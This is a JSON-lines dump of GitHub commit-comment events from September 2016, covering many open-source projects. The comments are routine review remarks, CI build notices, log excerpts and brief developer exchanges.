{"id":"4613500142","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19161653,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-25T01:56:55Z","updated_at":"2016-09-25T01:56:55Z","body":"iteration (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (2165 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.44%25-red.svg)</a> \n"}},"created_at":"2016-09-25T01:56:55Z"}
{"id":"4613501417","type":"CommitCommentEvent","actor":{"login":"indranilsinharoy"},"repo":{"name":"indranilsinharoy/PyZDDE"},"payload":{"comment":{"id":19161657,"position":null,"line":null,"path":null,"commit_id":"1b6cb3fdc0e976312b154316041744aacb6e9f20","created_at":"2016-09-25T01:58:16Z","updated_at":"2016-09-25T01:58:16Z","body":"This commit mainly fixes #66 and #67 "}},"created_at":"2016-09-25T01:58:16Z"}
{"id":"4613991808","type":"CommitCommentEvent","actor":{"login":"selaux"},"repo":{"name":"AMDmi3/ja2-stracciatella"},"payload":{"comment":{"id":19163139,"position":5,"line":51,"path":"configure","commit_id":"d44b458a635b345becd4e440b1e3bcba010285e3","created_at":"2016-09-25T10:01:00Z","updated_at":"2016-09-25T10:01:00Z","body":"Do you want to create a PR for our project? 😉 "}},"created_at":"2016-09-25T10:01:00Z"}
{"id":"4613992053","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163140,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T10:01:10Z","updated_at":"2016-09-25T10:01:10Z","body":"There has been a bugfix release to Twisted 16.4.0: 16.4.1\r\n"}},"created_at":"2016-09-25T10:01:10Z"}
{"id":"4613994587","type":"CommitCommentEvent","actor":{"login":"duncanspumpkin"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19163142,"position":82,"line":1130,"path":"src/ride/track_design_save.c","commit_id":"629e36bc0a396f89960f9ea358161cf18b508810","created_at":"2016-09-25T10:03:16Z","updated_at":"2016-09-25T10:03:16Z","body":"`^ 2` ! Source of track entrance bugs"}},"created_at":"2016-09-25T10:03:16Z"}
{"id":"4613998127","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163145,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T10:06:14Z","updated_at":"2016-09-25T10:06:14Z","body":"it is not truncated - there is no more information.\r\n\r\n11:35:11.5042 [   ] service/servicedvbrecord.cpp:190 stop [eDVBServiceRecord] stop recording!\r\n11:35:11.5043 [ E ] service/servicedvbrecord.cpp:569 saveCutlist [eDVBServiceRecord] saving cutlist failed because tstools failed\r\n11:35:11.5053 {   } Components/Sources/StreamService.py:28 recordEvent RECORD event for us: <enigma.iRecordableServicePtr; proxy of <Swig Object of type 'ePtr< iRecordableService > *' at 0x706a8590> >\r\n11:35:11.5086 {   } Components/Sources/StreamService.py:28 recordEvent RECORD event for us: <enigma.iRecordableServicePtr; proxy of <Swig Object of type 'ePtr< iRecordableService > *' at 0x706a8590> >\r\n11:35:11.5109 [   ] dvb/cahandler.cpp:329 unregisterService [eDVBCAService] free slot 0 demux 0 for service 1:0:19:283D:3FB:1:C00000:0:0:0:\r\n11:35:11.5110 [   ] dvb/cahandler.cpp:578 buildCAPMT [eDVBCAService] don't build/send the same CA PMT twice\r\n11:35:11.5134 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__ Unhandled error in Deferred:\r\n11:35:11.5267 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__ \r\n\r\nTraceback (most recent call last):\r\nFailure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.\r\n11:35:12.2109 [   ] service/servicedvbrecord.cpp:553 gotNewEvent [eDVBServiceRecord] now running: Sportschau (10200 seconds)\r\n11:35:12.2114 {   } Components/Sources/StreamService.py:28 recordEvent RECORD event for us: <enigma.iRecordableServicePtr; proxy of <Swig Object of type 'ePtr< iRecordableService > *' at 0x7231c3c8> >\r\n"}},"created_at":"2016-09-25T10:06:14Z"}
{"id":"4613998291","type":"CommitCommentEvent","actor":{"login":"patrickhlauke"},"repo":{"name":"w3c/pointerevents"},"payload":{"comment":{"id":19163146,"position":null,"line":null,"path":null,"commit_id":"63af43b4ff2908b2269da207b772dfb9bac66c1f","created_at":"2016-09-25T10:06:23Z","updated_at":"2016-09-25T10:06:23Z","body":"Belated LGTM"}},"created_at":"2016-09-25T10:06:23Z"}
{"id":"4614002478","type":"CommitCommentEvent","actor":{"login":"muneshmohitanand"},"repo":{"name":"khanhnamle94/Simulation-Project-"},"payload":{"comment":{"id":19163154,"position":null,"line":null,"path":null,"commit_id":"9d559868b1ec11c5ea49e1d15de77c98ef53d38c","created_at":"2016-09-25T10:09:59Z","updated_at":"2016-09-25T10:09:59Z","body":"the elevator should go up and down slower\r\n"}},"created_at":"2016-09-25T10:09:59Z"}
{"id":"4614004177","type":"CommitCommentEvent","actor":{"login":"Euronem"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19163157,"position":null,"line":null,"path":null,"commit_id":"d8821cb6859c00a2bcdc73124f22cc9c4cbb390c","created_at":"2016-09-25T10:11:23Z","updated_at":"2016-09-25T10:11:23Z","body":"Cука, мержер.\r\n"}},"created_at":"2016-09-25T10:11:23Z"}
{"id":"4614006250","type":"CommitCommentEvent","actor":{"login":"bitbandi"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":19163161,"position":null,"line":null,"path":null,"commit_id":"2f2458b10ee12bdbddbf95a2d4e6eb3bb6c5c4f5","created_at":"2016-09-25T10:13:25Z","updated_at":"2016-09-25T10:13:25Z","body":"What feature nedd this file for?\r\n\r\nI dont see any advantage."}},"created_at":"2016-09-25T10:13:25Z"}
{"id":"4614009725","type":"CommitCommentEvent","actor":{"login":"TheMightyBuzzard"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19163163,"position":null,"line":null,"path":null,"commit_id":"2a8ae063294ed6769b5701a071d895c8759638db","created_at":"2016-09-25T10:16:29Z","updated_at":"2016-09-25T10:16:29Z","body":"Nope, I couldn't say offhand but we can get you a copy of the current layout on dev."}},"created_at":"2016-09-25T10:16:29Z"}
{"id":"4614009793","type":"CommitCommentEvent","actor":{"login":"darnir"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19163164,"position":null,"line":null,"path":null,"commit_id":"9b2d7b7a9cd2b5e69b2c71919ba10e9fa8244cc0","created_at":"2016-09-25T10:16:32Z","updated_at":"2016-09-25T10:16:32Z","body":"Doesn't actually work. \r\n\r\n```\r\nlcov --no-external --capture --directory . --output-file libpsl.info\r\nCapturing coverage data from .\r\nFound gcov version: 6.2.1\r\nScanning . for .gcda files ...\r\ngeninfo: WARNING: no .gcda files found in . - skipping!\r\nFinished .info-file creation\r\ngenhtml --prefix . --ignore-errors source libpsl.info --legend --title \"libpsl\" --output-directory=lcov\r\nReading data file libpsl.info\r\ngenhtml: ERROR: no valid records found in tracefile libpsl.info\r\n```\r\n\r\nThis seems to happen because CFLAGS and LDFLAGS are not actually set when you run `make check`"}},"created_at":"2016-09-25T10:16:32Z"}
{"id":"4614010855","type":"CommitCommentEvent","actor":{"login":"LinusU"},"repo":{"name":"jprichardson/is-electron-renderer"},"payload":{"comment":{"id":19163166,"position":4,"line":4,"path":"index.js","commit_id":"e509f6302ab5873711187c5aa00abb907421878b","created_at":"2016-09-25T10:17:32Z","updated_at":"2016-09-25T10:17:32Z","body":"The two trailing spaces here broke the standard linter :("}},"created_at":"2016-09-25T10:17:32Z"}
{"id":"4614011107","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163168,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T10:17:43Z","updated_at":"2016-09-25T10:17:43Z","body":"This is what logger/file does in line 66:\r\n            self._outFile.write(text)\r\n\r\nNot really much ...\r\n"}},"created_at":"2016-09-25T10:17:43Z"}
{"id":"4614011356","type":"CommitCommentEvent","actor":{"login":"shashwat-vik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19163169,"position":12,"line":20,"path":"geocodertest.py","commit_id":"3e6f0d48006c47ad19fbd8772884b3550fbe623c","created_at":"2016-09-25T10:17:56Z","updated_at":"2016-09-25T10:17:56Z","body":"sent to shubhankar for next commit"}},"created_at":"2016-09-25T10:17:56Z"}
{"id":"4614012810","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19163171,"position":null,"line":null,"path":null,"commit_id":"a55d15b40cfe935c313bfb923117e8c2cfec147c","created_at":"2016-09-25T10:19:11Z","updated_at":"2016-09-25T10:19:11Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 269](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1233&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:26:32"}},"created_at":"2016-09-25T10:19:11Z"}
{"id":"4614016343","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":19163177,"position":null,"line":null,"path":null,"commit_id":"6ee46c582413711b379a0bbb7b758b8cb74db201","created_at":"2016-09-25T10:22:18Z","updated_at":"2016-09-25T10:22:18Z","body":"It's interesting. I can recall this issue and I thought that I made a fix and David reviewed and committed it two years ago.\r\n\r\nReviewed-by: Alexandr Akulich <akulichalexander@gmail.com>"}},"created_at":"2016-09-25T10:22:18Z"}
{"id":"4614018253","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19163179,"position":2,"line":1,"path":"src/app/book-monkey/iteration-5/directives/book-list-item/book-list-item.component.html","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-25T10:24:06Z","updated_at":"2016-09-25T10:24:06Z","body":"stimmt, der fall ist noch nicht abgedeckt"}},"created_at":"2016-09-25T10:24:06Z"}
{"id":"4614018551","type":"CommitCommentEvent","actor":{"login":"joschiwald"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19163181,"position":101,"line":1024,"path":"src/server/game/Spells/Auras/SpellAuraEffects.cpp","commit_id":"1c1ef5673329a6a3ffdfb9ce4838a76a9eeede0e","created_at":"2016-09-25T10:24:22Z","updated_at":"2016-09-25T10:24:22Z","body":"does dummy procs always have a spellscript?"}},"created_at":"2016-09-25T10:24:22Z"}
{"id":"4614022598","type":"CommitCommentEvent","actor":{"login":"d-koppenhagen"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19163187,"position":2,"line":1,"path":"src/app/book-monkey/iteration-5/directives/book-list-item/book-list-item.component.html","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-25T10:27:55Z","updated_at":"2016-09-25T10:27:55Z","body":"@GregOnNet see: https://github.com/Angular2Buch/book-monkey2/commit/6ce1dbf6c2c6d0bbf4b983609c776be1ce35058c ;-)"}},"created_at":"2016-09-25T10:27:55Z"}
{"id":"4614027700","type":"CommitCommentEvent","actor":{"login":"ryanbr"},"repo":{"name":"cmorse/easylist"},"payload":{"comment":{"id":19163190,"position":null,"line":null,"path":null,"commit_id":"079b2f86ac5d5dbad11970c928d2d212c5e1b9fe","created_at":"2016-09-25T10:31:48Z","updated_at":"2016-09-25T10:31:48Z","body":"If this is the \"Postal Code\" popup, blocking it would stop the scrollbar too."}},"created_at":"2016-09-25T10:31:48Z"}
{"id":"4614029531","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19163194,"position":75,"line":1748,"path":"src/psl.c","commit_id":"1baaacccd5e1349f12c32f57e4a5e7098525415c","created_at":"2016-09-25T10:33:31Z","updated_at":"2016-09-25T10:33:31Z","body":"Basically yes, but is that reliable ? I would like to consult the source code of libunistring first, though."}},"created_at":"2016-09-25T10:33:31Z"}
{"id":"4614030365","type":"CommitCommentEvent","actor":{"login":"RizwanZaheer"},"repo":{"name":"mosh-hamedani/angular2-course"},"payload":{"comment":{"id":19163196,"position":11,"line":6,"path":"app/posts/posts.component.ts","commit_id":"90c3135fa36232c32c0b69dd465dfc40f68566cd","created_at":"2016-09-25T10:34:14Z","updated_at":"2016-09-25T10:34:14Z","body":"// 1. Install typings\r\nnpm install typings -g\r\n// 2. Download jquery.d.ts (run this command in the root dir of your project)\r\ntypings install dt~underscore --global --save"}},"created_at":"2016-09-25T10:34:14Z"}
{"id":"4614030824","type":"CommitCommentEvent","actor":{"login":"tomate44"},"repo":{"name":"FreeCAD/FreeCAD"},"payload":{"comment":{"id":19163198,"position":5,"line":218,"path":"src/Mod/PartDesign/App/FeaturePrimitive.cpp","commit_id":"cb3da6ff9c45fe5726ad0d17580ebe6636b3ea55","created_at":"2016-09-25T10:34:42Z","updated_at":"2016-09-25T10:34:42Z","body":"Werner, there's a typo here : \"angel\" -> \"angle\"\r\nDoing a commit / PR myself would probably be overkill ?"}},"created_at":"2016-09-25T10:34:42Z"}
{"id":"4614031991","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"mnapoli/IsItMaintained"},"payload":{"comment":{"id":19163201,"position":null,"line":null,"path":null,"commit_id":"9c71c18c756d2b7e3613e144a871deeb7d3e3a12","created_at":"2016-09-25T10:35:45Z","updated_at":"2016-09-25T10:35:45Z","body":"@mnapoli why were issues disabled? (x-ref #23)"}},"created_at":"2016-09-25T10:35:45Z"}
{"id":"4614032281","type":"CommitCommentEvent","actor":{"login":"joschiwald"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19163202,"position":338,"line":6540,"path":"src/server/game/Spells/Auras/SpellAuraEffects.cpp","commit_id":"1c1ef5673329a6a3ffdfb9ce4838a76a9eeede0e","created_at":"2016-09-25T10:36:01Z","updated_at":"2016-09-25T10:36:01Z","body":"charges are dropped before proc handler, so charges is already decreased"}},"created_at":"2016-09-25T10:36:01Z"}
{"id":"4614033341","type":"CommitCommentEvent","actor":{"login":"sushilnayak"},"repo":{"name":"sushilnayak/webpack-template"},"payload":{"comment":{"id":19163207,"position":null,"line":null,"path":null,"commit_id":"e0a60df72d7d13b31e3af8a8beb90b87553e2841","created_at":"2016-09-25T10:37:05Z","updated_at":"2016-09-25T10:37:05Z","body":"Initial Commit"}},"created_at":"2016-09-25T10:37:05Z"}
{"id":"4614037014","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19163213,"position":null,"line":null,"path":null,"commit_id":"ce1e36ef9847b6097f5869856e37b7f87f6a2ce7","created_at":"2016-09-25T10:40:23Z","updated_at":"2016-09-25T10:40:23Z","body":"If there's no target, the rider doesn't occur"}},"created_at":"2016-09-25T10:40:23Z"}
{"id":"4614041456","type":"CommitCommentEvent","actor":{"login":"captn-cool"},"repo":{"name":"captn-cool/imad-2016-app"},"payload":{"comment":{"id":19163219,"position":5,"line":12,"path":"ui/index.html","commit_id":"b76107ea90ae8c97c6fb0d581920d13fd017b24d","created_at":"2016-09-25T10:44:06Z","updated_at":"2016-09-25T10:44:06Z","body":"Change made locally.\r\n"}},"created_at":"2016-09-25T10:44:06Z"}
{"id":"4614042294","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19163221,"position":null,"line":null,"path":null,"commit_id":"ce1e36ef9847b6097f5869856e37b7f87f6a2ce7","created_at":"2016-09-25T10:44:55Z","updated_at":"2016-09-25T10:44:55Z","body":"Also if you choose 'no', the rider doesn't occur. Silly me. Thanks for catching it."}},"created_at":"2016-09-25T10:44:55Z"}
{"id":"4614042346","type":"CommitCommentEvent","actor":{"login":"BaoWenjie"},"repo":{"name":"BaoWenjie/begin"},"payload":{"comment":{"id":19163222,"position":2,"line":2,"path":"README.md","commit_id":"4a5633e2d56b47379f663dbac808506e5aea50b6","created_at":"2016-09-25T10:44:58Z","updated_at":"2016-09-25T10:44:58Z","body":"开始"}},"created_at":"2016-09-25T10:44:58Z"}
{"id":"4614043063","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19163224,"position":75,"line":1748,"path":"src/psl.c","commit_id":"1baaacccd5e1349f12c32f57e4a5e7098525415c","created_at":"2016-09-25T10:45:30Z","updated_at":"2016-09-25T10:45:30Z","body":"Just coded your idea for both u8_tolower code parts. The tests survive valgrind checking. That looks promising."}},"created_at":"2016-09-25T10:45:30Z"}
{"id":"4614043531","type":"CommitCommentEvent","actor":{"login":"marci2oo9"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19163225,"position":null,"line":null,"path":null,"commit_id":"6d362ddf9fa5ce7a40133c5483e7fcac54a8830a","created_at":"2016-09-25T10:45:57Z","updated_at":"2016-09-25T10:45:57Z","body":"what is with the item tab ?\r\nit will not farm my pokeballs ... \r\ni set the greatball and superball to 50 and 100\r\nthan i uncheck catch pokemon and after 30 min farm i have only 10 superballs ???"}},"created_at":"2016-09-25T10:45:57Z"}
{"id":"4614044558","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19163227,"position":null,"line":null,"path":null,"commit_id":"ce1e36ef9847b6097f5869856e37b7f87f6a2ce7","created_at":"2016-09-25T10:46:51Z","updated_at":"2016-09-25T10:46:51Z","body":"Same thing happened last month.. 8b3c8588b1dcd8c This one always trips me up."}},"created_at":"2016-09-25T10:46:51Z"}
{"id":"4614046566","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19163230,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-25T10:48:40Z","updated_at":"2016-09-25T10:48:40Z","body":"No man , there's none dialog . When I compile xGlyphController, the application icon is not displayed, to make it appear I noticed that I have to install or uninstall any tweak (obviously not XglyphiOS or xGlyphController)"}},"created_at":"2016-09-25T10:48:40Z"}
{"id":"4614047526","type":"CommitCommentEvent","actor":{"login":"joschiwald"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19163232,"position":null,"line":null,"path":null,"commit_id":"1c1ef5673329a6a3ffdfb9ce4838a76a9eeede0e","created_at":"2016-09-25T10:49:34Z","updated_at":"2016-09-25T10:49:34Z","body":"thats a very big commit, hard to review, and harder to merge to 6.x, that i warned you, 75% are script convertions, half of them are already in 6.x"}},"created_at":"2016-09-25T10:49:34Z"}
{"id":"4614049082","type":"CommitCommentEvent","actor":{"login":"zedhunter1990"},"repo":{"name":"zedhunter1990/SharePro"},"payload":{"comment":{"id":19163233,"position":4,"line":13,"path":"Inka/src/com/example/inka/MainActivity.java","commit_id":"f7ce2a05ed1c58f0e8966e40f0459d472a148501","created_at":"2016-09-25T10:50:53Z","updated_at":"2016-09-25T10:50:53Z","body":"jkjlkj"}},"created_at":"2016-09-25T10:50:53Z"}
{"id":"4614051082","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19163235,"position":null,"line":null,"path":null,"commit_id":"ce1e36ef9847b6097f5869856e37b7f87f6a2ce7","created_at":"2016-09-25T10:52:41Z","updated_at":"2016-09-25T10:52:41Z","body":"Hehe - I'll keep an eye out for next month 😉 "}},"created_at":"2016-09-25T10:52:41Z"}
{"id":"4614054293","type":"CommitCommentEvent","actor":{"login":"sacdallago"},"repo":{"name":"PokemonGoers/PredictPokemon-2"},"payload":{"comment":{"id":19163238,"position":null,"line":null,"path":null,"commit_id":"6014fc5741bb9b599e28f53e63e0d287df05253e","created_at":"2016-09-25T10:55:19Z","updated_at":"2016-09-25T10:55:19Z","body":"@PokemonGoers/predictpokemon-2 "}},"created_at":"2016-09-25T10:55:19Z"}
{"id":"4614055575","type":"CommitCommentEvent","actor":{"login":"ralsina"},"repo":{"name":"getnikola/nikola"},"payload":{"comment":{"id":19163240,"position":8,"line":182,"path":"nikola/post.py","commit_id":"de83db3d920aeca4fab03ab07c7653f6e962e794","created_at":"2016-09-25T10:56:22Z","updated_at":"2016-09-25T10:56:22Z","body":"why OSError? Maybe ValueError?"}},"created_at":"2016-09-25T10:56:22Z"}
{"id":"4614060192","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19163251,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-25T11:00:22Z","updated_at":"2016-09-25T11:00:22Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.179](http://build.clear-measure.com/viewLog.html?buildId=10699&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-25T11:00:22Z"}
{"id":"4614063324","type":"CommitCommentEvent","actor":{"login":"jorgegorka"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19163255,"position":51,"line":51,"path":"cdx_core/app/assets/javascripts/components/approvals/approvals_table.js.jsx","commit_id":"834ca514931c781160480d7e64d3774ce39eae2f","created_at":"2016-09-25T11:02:35Z","updated_at":"2016-09-25T11:02:35Z","body":"data-resizable-columns-id must be unique on each table.  We use it to store information about the size of each column so when the user resizes them and reload the page the size is not lost."}},"created_at":"2016-09-25T11:02:35Z"}
{"id":"4614063826","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19163257,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-25T11:03:01Z","updated_at":"2016-09-25T11:03:01Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.179](http://build.clear-measure.com/viewLog.html?buildId=10699&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:39"}},"created_at":"2016-09-25T11:03:01Z"}
{"id":"4614066401","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"MakerTim/LuckPermsUI"},"payload":{"comment":{"id":19163262,"position":1,"line":1,"path":"src/main/java/META-INF/MANIFEST.MF","commit_id":"a7ec0732e0c383ab56124fa596d63b9df3791451","created_at":"2016-09-25T11:05:13Z","updated_at":"2016-09-25T11:05:13Z","body":"No no no, wtf is that xD"}},"created_at":"2016-09-25T11:05:13Z"}
{"id":"4614066432","type":"CommitCommentEvent","actor":{"login":"jamesbloomnektan"},"repo":{"name":"jamesdbloom/mockserver"},"payload":{"comment":{"id":19163263,"position":null,"line":null,"path":null,"commit_id":"35f8fe5c7bb251d800e95fe40ff63b6b0d5c9750","created_at":"2016-09-25T11:05:15Z","updated_at":"2016-09-25T11:05:15Z","body":"As I remember if a Host header is provided the MockServer should auto-generate a new certificate with the correct subject alternative name.\r\n\r\nWould this meet your requirement? \r\n\r\nThis functionality definitely works for the proxy but I need to double check if this definitely works for the MockServer as well as the proxy, if not it should be easily to resolve. Such an approach would be a better solution because it's more dynamic and does require special run configuration. In particular runconfiguration would typically need to be supported in Docker and Maven as well to maintains parity."}},"created_at":"2016-09-25T11:05:15Z"}
{"id":"4614066721","type":"CommitCommentEvent","actor":{"login":"lodici"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19163264,"position":null,"line":null,"path":null,"commit_id":"ce1e36ef9847b6097f5869856e37b7f87f6a2ce7","created_at":"2016-09-25T11:05:28Z","updated_at":"2016-09-25T11:05:28Z","body":"Perhaps consider adding more info to the ```status``` property using a delimiter of some sort, eg.\r\n```\r\nstatus=needs groovy; see #ce1e36ef9847b6097f5869856e37b7f87f6a2ce7\r\n```"}},"created_at":"2016-09-25T11:05:28Z"}
{"id":"4614067218","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"MakerTim/LuckPermsUI"},"payload":{"comment":{"id":19163265,"position":1,"line":1,"path":"src/main/java/META-INF/MANIFEST.MF","commit_id":"a7ec0732e0c383ab56124fa596d63b9df3791451","created_at":"2016-09-25T11:05:53Z","updated_at":"2016-09-25T11:05:53Z","body":"Maven already cares about that"}},"created_at":"2016-09-25T11:05:53Z"}
{"id":"4614069609","type":"CommitCommentEvent","actor":{"login":"chandler888"},"repo":{"name":"chandler888/chandler888.github.io"},"payload":{"comment":{"id":19163269,"position":null,"line":null,"path":null,"commit_id":"938c120dbcb4d106ddbe716a566e8021674b55cc","created_at":"2016-09-25T11:07:51Z","updated_at":"2016-09-25T11:07:51Z","body":"first"}},"created_at":"2016-09-25T11:07:51Z"}
{"id":"4614071968","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"cheminfo/font"},"payload":{"comment":{"id":19163271,"position":null,"line":null,"path":null,"commit_id":"b456d22816fb17acda57bf7f9acee22673d4da42","created_at":"2016-09-25T11:09:54Z","updated_at":"2016-09-25T11:09:54Z","body":"you should add the original SVG, not the dist directory. It will be overwritten by the build script anyway"}},"created_at":"2016-09-25T11:09:54Z"}
{"id":"4614074479","type":"CommitCommentEvent","actor":{"login":"Darcidride"},"repo":{"name":"MinetestForFun/xorhub-serverscontents"},"payload":{"comment":{"id":19163273,"position":null,"line":null,"path":null,"commit_id":"fd9e4d1ee9ed5b50908a98ac4256c27e8cddbbe6","created_at":"2016-09-25T11:11:55Z","updated_at":"2016-09-25T11:11:55Z","body":"Well, no need to keep more than 200MB of debug.txt logs, for the SB it's near 1 month of logs, for the other servers it's more than 4-6 months of logs...\r\n![graphs_disk_size_usage](http://i.imgur.com/dqI5jWw.png)\r\n\r\nThe SB logs are really verbose and reach sometimes 5GB before I rotate them..."}},"created_at":"2016-09-25T11:11:55Z"}
{"id":"4614075138","type":"CommitCommentEvent","actor":{"login":"masscreation"},"repo":{"name":"driftyco/ionic-preview-app"},"payload":{"comment":{"id":19163275,"position":null,"line":null,"path":null,"commit_id":"220611f5247806cba56c3ecce702e799a478cc74","created_at":"2016-09-25T11:12:26Z","updated_at":"2016-09-25T11:12:26Z","body":"Where do I find the ionic.config.js file? "}},"created_at":"2016-09-25T11:12:26Z"}
{"id":"4614075476","type":"CommitCommentEvent","actor":{"login":"draknyte1"},"repo":{"name":"draknyte1/GTplusplus"},"payload":{"comment":{"id":19163276,"position":null,"line":null,"path":null,"commit_id":"9b9d7fe5f34a9b6dac1fa8b39660c5cbe1787aae","created_at":"2016-09-25T11:12:44Z","updated_at":"2016-09-25T11:12:44Z","body":"[http://imgur.com/T0e6Nac](url)"}},"created_at":"2016-09-25T11:12:44Z"}
{"id":"4614076071","type":"CommitCommentEvent","actor":{"login":"pascalbetz"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19163277,"position":38,"line":32,"path":"app/services/payment_method_fetcher.rb","commit_id":"7435398381bccd229a41befbcccef2bc4944369a","created_at":"2016-09-25T11:13:09Z","updated_at":"2016-09-25T11:13:09Z","body":"You can use `@filter.blank?`\r\n\r\n```ruby\r\n[].blank?   # => true\r\nnil.blank?  # => true\r\n[1].blank?  # => false\r\n```\r\nIn any case I would recommend against using `and`.\r\n\r\nWhy did you change default for `@filter` to nil? I'd actually make sure that it is always _non-nil_ instead. "}},"created_at":"2016-09-25T11:13:09Z"}
{"id":"4614079504","type":"CommitCommentEvent","actor":{"login":"bilazik"},"repo":{"name":"almasaeed2010/AdminLTE"},"payload":{"comment":{"id":19163283,"position":null,"line":null,"path":null,"commit_id":"1bffa9fd44ed1478f83c9425660195cdd01e0ec0","created_at":"2016-09-25T11:16:13Z","updated_at":"2016-09-25T11:16:13Z","body":"Oh, thanks. I fixed this by javascript but this is better than my hardcode:)"}},"created_at":"2016-09-25T11:16:13Z"}
{"id":"4614086991","type":"CommitCommentEvent","actor":{"login":"tib"},"repo":{"name":"battlmonstr/awesome-xcode-extensions"},"payload":{"comment":{"id":19163294,"position":null,"line":null,"path":null,"commit_id":"0e9343905e027cc868a62b2e218d00af83c6e400","created_at":"2016-09-25T11:22:46Z","updated_at":"2016-09-25T11:22:46Z","body":"can you send me a new pull request with this fix, please? :)"}},"created_at":"2016-09-25T11:22:46Z"}
